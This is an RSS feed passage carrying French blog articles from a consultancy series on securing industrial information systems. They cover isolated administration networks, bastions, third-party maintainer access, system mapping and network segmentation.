										<content:encoded><![CDATA[<p><em>Après avoir découvert les prémisses de la sécurisation des SI Industriels au travers de la cartographie de ces systèmes et de leur cloisonnement, nous allons maintenant aborder leur administration.</em></p>
<h2>L’administration, point névralgique de l’architecture réseau</h2>
<p>L’administration d’un SI est essentielle pour garantir sa disponibilité et sa sécurité. <strong>Dans un programme de sécurisation d’un SI, il convient de prendre en compte les objectifs que l’on souhaite atteindre</strong> afin d’obtenir le modèle le plus adapté. Dans notre cas, les bonnes pratiques que nous observons sur le terrain consistent à :</p>
<ul>
<li><strong>Créer un réseau d’administration isolé du réseau de production et étendu </strong>à la fois en central et localement pour protéger les flux d’administration afin d’éviter des pertes d’intégrité sur des flux de pilotage d’opérations sensibles ;</li>
<li><strong>Protéger les équipements d’administration </strong>pour éviter une prise de contrôle directe de ces éléments critiques par un attaquant ;</li>
<li><strong>Homogénéiser au maximum les pratiques et standardiser les équipements </strong>afin de faciliter les déploiements d’une architecture d’administration sécurisée voire centralisée, et le maintien dans le temps du niveau de sécurité – cela pouvant se faire en mutualisant les ressources dans une équipe centrale et dédiée.</li>
</ul>
<p>Attention, nous ne traitons ici que l’administration de l’infrastructure des SI Industriels. L’administration des automates, par exemple, est faite par le métier pour ce qui est de la configuration et passera par le poste de configuration et de maintenance dédié, en cas de besoin de mise à jour.</p>
<p>La première étape consiste à créer la structure du réseau d’administration isolé et étendu. Cet objectif peut être atteint au travers des mesures suivantes :</p>
<ul>
<li>Dans une optique d’optimisation et de mutualisation des ressources<strong>, le réseau d’administration est construit autour d’un ou plusieurs datacenters</strong>, notamment pour assurer le DRP<a href="#_ftn1" name="_ftnref1">[1]</a>.</li>
<li>Afin de réduire le risque de propagation par rebond depuis un site infecté, le réseau WAN<a href="#_ftn2" name="_ftnref2">[2]</a> mis en place entre le datacenter et les sites industriels peut être configuré en <strong>hub and spoke<a href="#_ftn3" name="_ftnref3">[3]</a> </strong>pour<strong> </strong>assurer une isolation entre chaque site.</li>
<li>Pour pouvoir garantir l’intégrité et la confidentialité des flux d’administration, ceux-ci doivent être isolés au sein d’une <strong>VRF<a href="#_ftn4" name="_ftnref4">[4]</a> spécifique</strong> ou d’un réseau <strong>VPN<a href="#_ftn5" name="_ftnref5">[5]</a> d’administration</strong> entre le datacenter et chaque site. La mise en place de ce réseau dédié à l’administration se fait notamment par l’utilisation d’équipements télécom, de sécurité et d’interfaces dédiées sur les serveurs.</li>
<li>Pour les sites les plus importants, le risque d’intrusion depuis le LAN utilisateur peut être réduit par la mise en place d’un <strong>LAN<a href="#_ftn6" name="_ftnref6">[6]</a> d’administration accessible uniquement depuis le LAN d’administration du datacenter</strong>. Une telle architecture doit cependant prévoir une <strong>solution de résilience</strong> dans le cas où le WAN venait à être coupé pour permettre aux sites d’y accéder directement mais aussi pour les équipements qui ne sont tout simplement pas maintenables à distance.</li>
<li>Les entreprises ayant de nombreux sites peuvent également utiliser <strong>un boitier standardisé </strong>embarquant toutes les fonctions de sécurité nécessaires à l’interconnexion d’un site. Cela facilite en effet la configuration et le maintien en conditions de sécurité.</li>
</ul>
<p>&nbsp;</p>
<figure id="post-12348 media-12348" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-12348 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Schema-1.png" alt="" width="1068" height="364" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Schema-1.png 1068w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Schema-1-437x149.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Schema-1-71x24.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Schema-1-768x262.png 768w" sizes="auto, (max-width: 1068px) 100vw, 1068px" /></figure>
<p style="text-align: center;"><em>Figure 1 &#8211; Schéma d’interconnexion d’un site standard ou avec SCADA</em></p>
<p>&nbsp;</p>
<p>La deuxième étape consiste à brancher les équipements d’administration et les équipements à administrer sur ce réseau en les protégeant d’une compromission.</p>
<p>&nbsp;</p>
<figure id="post-12350 media-12350" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-12350 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-1.png" alt="" width="1046" height="336" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-1.png 1046w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-1-437x140.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-1-71x23.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-1-768x247.png 768w" sizes="auto, (max-width: 1046px) 100vw, 1046px" /></figure>
<p>&nbsp;</p>
<figure id="post-12352 media-12352" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-12352 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Schema-2.png" alt="" width="1067" height="302" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Schema-2.png 1067w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Schema-2-437x124.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Schema-2-71x20.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Schema-2-768x217.png 768w" sizes="auto, (max-width: 1067px) 100vw, 1067px" /></figure>
<p style="text-align: center;"><em>Figure 2 &#8211; Schéma d’interconnexion d’un site autonome</em></p>
<p>&nbsp;</p>
<figure id="post-12354 media-12354" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-12354 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-2.png" alt="" width="1044" height="333" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-2.png 1044w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-2-437x139.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-2-71x23.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-2-768x245.png 768w" sizes="auto, (max-width: 1044px) 100vw, 1044px" /></figure>
<p>&nbsp;</p>
<p>Il arrive également d’avoir <strong>une partie du SI complétement déconnectée</strong> pour des raisons diverses. Ce SI étant déconnecté, il ne présente pas de risque SSI mais uniquement un risque métier. Son état déconnecté abaisse cependant son niveau d’exposition et donc le risque d’intrusion. Il est donc opportun de réaliser une analyse de risques pour décider de la façon de procéder. Les moyens seront alors adaptés en allant d’une simple procédure d’administration locale jusqu’à la mise en place d’une infrastructure d’administration dédiée, celle-ci pouvant se révéler coûteuse.</p>
<p>Ces différentes briques réseau permettent ainsi aux administrateurs centraux d’accéder aux équipements. Il faut cependant leur donner accès aux outils nécessaires.</p>
<p>&nbsp;</p>
<h2>L’outillage des administrateurs, comment prévoir leurs besoins en garantissant la sécurité</h2>
<p>&nbsp;</p>
<p>La gestion des SI de Gestion et Industriel étant généralement distincte, <strong>l’outillage mis en œuvre est dédié</strong>, bien qu’il puisse s’appuyer sur des produits identiques. La mise en place de cet outillage va permettre de répondre à plusieurs objectifs :</p>
<ul>
<li><strong>Assurer le contrôle d’accès </strong>sur les interfaces d’administration pour réduire la probabilité d’obtention de capacités d’attaque et d’utilisation frauduleuse des outils ;</li>
<li><strong>Tracer les actions </strong>des administrateurs pour réduire les impacts potentiels d’une attaque en se créant des moyens de détection et réaction et en assurant la facilité d’investigation à posteriori.</li>
</ul>
<p>Cela se traduit par la mise en œuvre d’<strong>une chaîne d’administration.</strong></p>
<p>&nbsp;</p>
<figure id="post-12356 media-12356" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-12356 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Schema-3.png" alt="" width="1055" height="297" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Schema-3.png 1055w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Schema-3-437x123.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Schema-3-71x20.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Schema-3-768x216.png 768w" sizes="auto, (max-width: 1055px) 100vw, 1055px" /></figure>
<p style="text-align: center;"><em>Figure 3 &#8211; Schéma de principe de la chaîne d’administration</em></p>
<p>&nbsp;</p>
<p>Afin de centraliser les accès et de maintenir un contrôle fin sur les autorisations, un <strong>bastion d’administration</strong> doit être mis en place. Les comptes génériques sont joués par le bastion et protégés dans son coffre-fort numérique. Le bastion assure également la traçabilité des actions et diminue le risque de vol de comptes à privilèges génériques. Le bastion peut également sécuriser les flux d’administration en réalisant de la translation de protocole (Telnet<a href="#_ftn8" name="_ftnref8">[8]</a> vers SSH<a href="#_ftn9" name="_ftnref9">[9]</a> par exemple).</p>
<p>Pour les équipements ayant un niveau de maturité sécurité suffisant (gestion fine des droits, traçabilité, comptes nominatifs), il peut être envisagé d’assurer leur administration directement, sans passer par un bastion (cela peut notamment être le cas pour des équipements télécom).</p>
<p>&nbsp;</p>
<figure id="post-12358 media-12358" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-12358 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-3.png" alt="" width="1049" height="382" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-3.png 1049w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-3-437x159.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-3-71x26.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-3-768x280.png 768w" sizes="auto, (max-width: 1049px) 100vw, 1049px" /></figure>
<p>&nbsp;</p>
<p>La mise en place d’un poste d’administration dédié, où seront installés les outils nécessaires au Métier, nécessite la mise en place d’un processus d’installation de ces outils afin de maintenir le niveau de sécurité de ce poste mais aussi de connaître la liste des outils déployés sur le SI.</p>
<p>&nbsp;</p>
<figure id="post-12360 media-12360" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-12360 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-4.png" alt="" width="1050" height="224" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-4.png 1050w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-4-437x93.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-4-71x15.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-4-768x164.png 768w" sizes="auto, (max-width: 1050px) 100vw, 1050px" /></figure>
<h2></h2>
<h2>La prise en compte des mainteneurs externes</h2>
<p>&nbsp;</p>
<p>Enfin, il est primordial de <strong>sécuriser l’accès des tiers mainteneurs</strong> afin de limiter les risques provenant d’accès abusifs ou non cadrés (infection du SI après installation d’un outil non validé, perte de donnée liée à un tiers malicieux, indisponibilité des équipements, …).</p>
<p>La mise en œuvre d’un <strong>point d’accès externe</strong> avec une <strong>authentification forte</strong> est nécessaire afin de garantir l’identité des utilisateurs. Ce point d’accès permet aux mainteneurs d’accéder à un poste de rebond maîtrisé et durci par le client tout en assurant la traçabilité des actions. Sur ce point, les clients les plus avancés mettent en œuvre des solutions permettant de ne donner accès au SI que durant la durée de l’intervention et cela uniquement après validation interne.</p>
<p>&nbsp;</p>
<figure id="post-12362 media-12362" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-12362 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-5.png" alt="" width="1050" height="248" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-5.png 1050w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-5-437x103.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-5-71x17.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-5-768x181.png 768w" sizes="auto, (max-width: 1050px) 100vw, 1050px" /></figure>
<p>&nbsp;</p>
<p>Les <strong>postes de configuration et de maintenance</strong>, dédiés au site et aux automates, doivent quant à eux faire l’objet d’un suivi particulier pour être mis à jour et rester en conditions de sécurité, notamment pour ce qui est des outils déployés.</p>
<p>&nbsp;</p>
<figure id="post-12364 media-12364" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-12364 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-6.png" alt="" width="1051" height="290" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-6.png 1051w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-6-437x121.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-6-71x20.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Tableau-6-768x212.png 768w" sizes="auto, (max-width: 1051px) 100vw, 1051px" /></figure>
<p>&nbsp;</p>
<p>Pour aller plus loin, on peut s’intéresser au Groupe de Travail de l’ANSSI<a href="#_ftn12" name="_ftnref12">[12]</a> sur la Cybersécurité des Systèmes Industriels et à son <strong>référentiel PIMSEC<a href="#_ftn13" name="_ftnref13">[13]</a></strong> qui recommande un certain nombre d’exigences de sécurité à appliquer contractuellement à ses prestataires intervenants sur le SI Industriel.</p>
<p>&nbsp;</p>
<p>Nous avons à présent une connaissance de nos équipements et des solutions pour les sécuriser et les administrer. Cependant, les enjeux de cybersécurité évoluent dans le temps, il est donc primordial de garantir un niveau de sécurité dans le temps et de déployer des moyens de détection adéquats. Comment ? Ce sera le sujet de notre prochaine article !</p>
<p>&nbsp;</p>
<p><a href="#_ftnref1" name="_ftn1">[1]</a> <em>Disaster Recovery Plan</em> i.e. Plan de Reprise d’Activité.</p>
<p><a href="#_ftnref2" name="_ftn2">[2]</a> WAN i.e. <em>Wide Area Network.</em></p>
<p><a href="#_ftnref3" name="_ftn3">[3]</a> Réseau <em>Hub and Spoke</em> i.e. Réseau en étoile autour du data center.</p>
<p><a href="#_ftnref4" name="_ftn4">[4]</a> Virtual Routing and Forwarding i.e. un plan de routage virtuel.</p>
<p><a href="#_ftnref5" name="_ftn5">[5]</a> VPN i.e. Virtual Private Network.</p>
<p><a href="#_ftnref6" name="_ftn6">[6]</a> LAN i.e. <em>Local Area Network</em>.</p>
<p><a href="#_ftnref7" name="_ftn7">[7]</a> VLAN i.e. Virtual Local Area Network, ou Virtual LAN</p>
<p><a href="#_ftnref8" name="_ftn8">[8]</a> Telnet i.e. Terminal Network, Telecommunication Network ou encore Teletype Network</p>
<p><a href="#_ftnref9" name="_ftn9">[9]</a> SSH i.e. Secure Shell</p>
<p><a href="#_ftnref10" name="_ftn10">[10]</a> RDP i.e. Remote Desktop Protocol</p>
<p><a href="#_ftnref11" name="_ftn11">[11]</a> Loi de Programmation Militaire servant à identifier et sécuriser les organisations et les SI d’Importance vitale.</p>
<p><a href="#_ftnref12" name="_ftn12">[12]</a> ANSSI i.e. Agence Nationale de la Sécurité des Systèmes d’Information.</p>
<p><a href="#_ftnref13" name="_ftn13">[13]</a> PMSEC i.e. Référentiel d’exigences de sécurité pour les prestataires d’intégration et de maintenance de Systèmes Industriels.</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2019/12/cybersecurite-si-industriels-2-3/">Saga (2/3) &#8211; Retours d&rsquo;expérience et bonnes pratiques pour protéger et maintenir en condition de sécurité des SI industriels</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Saga (1/3) &#8211; Retours d&#8217;expérience et bonnes pratiques pour protéger et maintenir en condition de sécurité des SI industriels</title>
		<link>https://www.riskinsight-wavestone.com/2019/12/cybersecurite-si-industriels-1-3/</link>
		
		<dc:creator><![CDATA[Ali Fawaz]]></dc:creator>
		<pubDate>Fri, 13 Dec 2019 10:44:31 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Manufacturing & Industry 4.0]]></category>
		<category><![CDATA[manuf & industry 4.0]]></category>
		<category><![CDATA[SCADA]]></category>
		<category><![CDATA[SI industriel]]></category>
		<category><![CDATA[système d'information]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=12304</guid>

					<description><![CDATA[<p>Depuis plusieurs années, nous accompagnons les changements profonds que vivent les Systèmes d’Information Industriels avec une ouverture à marche forcée et une utilisation de technologie des SI de Gestion de plus en plus fréquente. Le niveau d’exposition et de menace augmentant, il est crucial d’assurer...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2019/12/cybersecurite-si-industriels-1-3/">Saga (1/3) &#8211; Retours d&rsquo;expérience et bonnes pratiques pour protéger et maintenir en condition de sécurité des SI industriels</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>Depuis plusieurs années, nous accompagnons les changements profonds que vivent les Systèmes d’Information Industriels avec une ouverture à marche forcée et une utilisation de technologie des SI de Gestion de plus en plus fréquente. Le niveau d’exposition et de menace augmentant, il est crucial d’assurer aisément leur maintien en conditions de sécurité en coordination avec le Métier. Quels sont les retours terrain et les bonnes pratiques pour protéger et maintenir en condition de sécurité des SI Industriels ?  </em></p>
<p><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<h2><span data-contrast="none">L’ouverture au SI de Gestion, une nécessité mais un vecteur de risques </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></h2>
<p><b><span data-contrast="none">Historiquement, le SI Industriel n’était pas interconnecté avec le SI de Gestion</span></b><span data-contrast="none">, par absence de besoin ou par recherche d’une limitation de son exposition. L’essentiel des actions se faisait localement, directement sur les équipements ou à distance avec des moyens spécifiques, avec une gouvernance et des opérations souvent elles-mêmes locales. </span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="none">L’évolution des besoins Métier et l’optimisation des procédés de production ont fait émerger de nouveaux enjeux moins locaux (supervision à distance, télémaintenance,</span><span data-contrast="none"> </span><span data-contrast="none">émergence de l’IoT</span><span data-contrast="none">, standardisation et rationalisation des technologies et des compétences, cyber menaces, etc.) dans le but d’accroitre la performance et le confort des opérations. Ces enjeux ont amené un besoin de numérisation et d’interconnexion entre les SI Industriels et les SI de Gestion.</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="none">Bien que nécessaires au bon fonctionnement des Métiers, nos échanges avec les opérationnels montrent bien que ces interconnexions ont eu pour conséquence de générer des </span><b><span data-contrast="none">risques d’intrusion et de propagation entre ces systèmes d’informations </span></b><span data-contrast="none">:</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></p>
<ul>
<li data-leveltext="" data-font="Symbol" data-listid="29" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><span data-contrast="none">Sur </span><b><span data-contrast="none">les opérations et la qualité</span></b><span data-contrast="none"> avec de potentiels arrêts ou altérations de lignes de production entraînant des impacts financiers, d’image voire humains ;</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:240,&quot;335559739&quot;:160,&quot;335559740&quot;:276}"> </span></li>
</ul>
<ul>
<li data-leveltext="" data-font="Symbol" data-listid="29" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><span data-contrast="none">Sur la </span><b><span data-contrast="none">s</span></b><b><span data-contrast="none">écuri</span></b><b><span data-contrast="none">té</span></b><span data-contrast="none"> </span><b><span data-contrast="none">des installations</span></b><span data-contrast="none"> en cas de compromission grave d’outils de production pouvant avoir des impacts sur l’humain ou l’environnement.</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:240,&quot;335559739&quot;:160,&quot;335559740&quot;:276}"> </span></li>
</ul>
<p><span data-contrast="none">La </span><b><span data-contrast="none">mitigation de ces risques d’intrusion et de propagation</span></b><span data-contrast="none"> et de leur conséquence nécessite de mettre en place des activités et mesures de sécurité en différentes étapes :</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></p>
<ul>
<li data-leveltext="" data-font="Symbol" data-listid="32" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><span data-contrast="none">La cartographie du SI Industriel ;</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:276}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="32" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><span data-contrast="none">La mise en place d’une architecture réseau sécurisée ;</span><span data-contrast="auto"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="32" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><span data-contrast="none">Le durcissement puis le maintien en conditions de sécurité des différents systèmes ;</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:276}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="32" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><span data-contrast="none">Enfin, la mise en place de moyens de détection d’incident et de réaction.</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:276}"> </span></li>
</ul>
<p><span data-contrast="none">Les autorités se sont par ailleurs penchées sur le sujet et imposent ces mesures, et d’autres encore, sur les périmètres les plus sensibles.</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="none">Des interventions parfois distantes et potentiellement fréquentes (patch management, revue de compte, contrôle d’intégrité etc.), d’équipes plus éloignées des opérations, peuvent alors être nécessaires et se heurter à un modèle opérationnel historique pensé pour privilégier la continuité et l’intégrité des opérations, la qualité, l’hygiène et la sûreté, tout en minimisant les disruptions.</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></p>
<p><b><span data-contrast="none">Comment mettre en place ces mesures</span></b><span data-contrast="none"> sans pour autant perdre de vue la finalité du SI Industriel : faire fonctionner un procédé physique de façon nominale ?</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></p>
<p>&nbsp;</p>
<h2><span data-contrast="none">La cartographie, un prérequis au traitement des risques de cybersécurité sur les SI Industriels </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></h2>
<p><span data-contrast="none">Afin d</span><span data-contrast="none">’évaluer les risques et </span><span data-contrast="none">maîtriser les impacts potentiels des mesures, la première action à mener et de </span><b><span data-contrast="none">construire une cartographie SI</span></b><span data-contrast="none"> des installations Industrielles permettant :</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></p>
<ul>
<li data-leveltext="" data-font="Symbol" data-listid="31" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><span data-contrast="none">De connaître les systèmes à administrer et à maintenir à jour ;</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1080,&quot;335559739&quot;:160,&quot;335559740&quot;:276}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="31" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><span data-contrast="none">D’identifier les utilisateurs Métier et donc les interlocuteurs à impliquer lorsqu’un changement est nécessaire, pour en maîtriser les impacts opérationnels ;</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1080,&quot;335559739&quot;:160,&quot;335559740&quot;:276}"> </span></li>
<li data-leveltext="" data-font="Symbol" data-listid="31" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><span data-contrast="none">D’évaluer les impacts potentiels de nouvelles vulnérabilités et failles de sécurité en matière de sûreté, d’opérations et de qualité.</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1080,&quot;335559739&quot;:160,&quot;335559740&quot;:276}"> </span></li>
</ul>
<figure id="post-12305 media-12305" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-12305 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-1-1.png" alt="" width="1368" height="789" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-1-1.png 1368w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-1-1-120x70.png 120w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-1-1-331x191.png 331w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-1-1-768x443.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-1-1-68x39.png 68w" sizes="auto, (max-width: 1368px) 100vw, 1368px" /></figure>
<p><span data-contrast="none">Une fois que le processus de cartographie est lancé, il faut également formaliser la </span><b><span data-contrast="none">procédure de mise à jour de cette même cartographie</span></b><span data-contrast="none"> en définissant une fréquence de mise à jour par degré de criticité puis s’atteler au traitement des risques. </span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="none">Ce chantier conséquent va donc requérir </span><b><span data-contrast="none">un dialogue et une</span></b><span data-contrast="none"> </span><b><span data-contrast="none">collaboration étroite avec les automaticiens et les membres de l’ingénierie</span></b><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<figure id="post-12307 media-12307" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-12307 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-2-1.png" alt="" width="1359" height="614" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-2-1.png 1359w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-2-1-423x191.png 423w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-2-1-768x347.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-2-1-71x32.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2019/12/Image-2-1-730x330.png 730w" sizes="auto, (max-width: 1359px) 100vw, 1359px" /></figure>
<p>&nbsp;</p>
<h2><span data-contrast="none">La mitigation des risques sur le SI INDUSTRIEL par la mise en place d’une architecture de sécurité </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></h2>
<p><span data-contrast="none">La sécurité n’étant pas un sujet nouveau, il parait donc logique de vouloir suivre les principes d’architecture et de sécurité des SI de Gestion pour les SI Industriels tout en les adaptant à leurs spécificités :</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:240}"> </span></p>
<ul>
<li data-leveltext="" data-font="Symbol" data-listid="33" aria-setsize="-1" data-aria-posinset="1" data-aria-level="2"><span data-contrast="none">Réduire les risques de propagation et d’intrusion en assurant un </span><b><span data-contrast="none">cloisonnement</span></b><span data-contrast="none"> du SI Industriel et en restreignant les accès ;</span><span data-contrast="auto"> </span><span data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:160,&quot;335559740&quot;:276}"> </span></li>
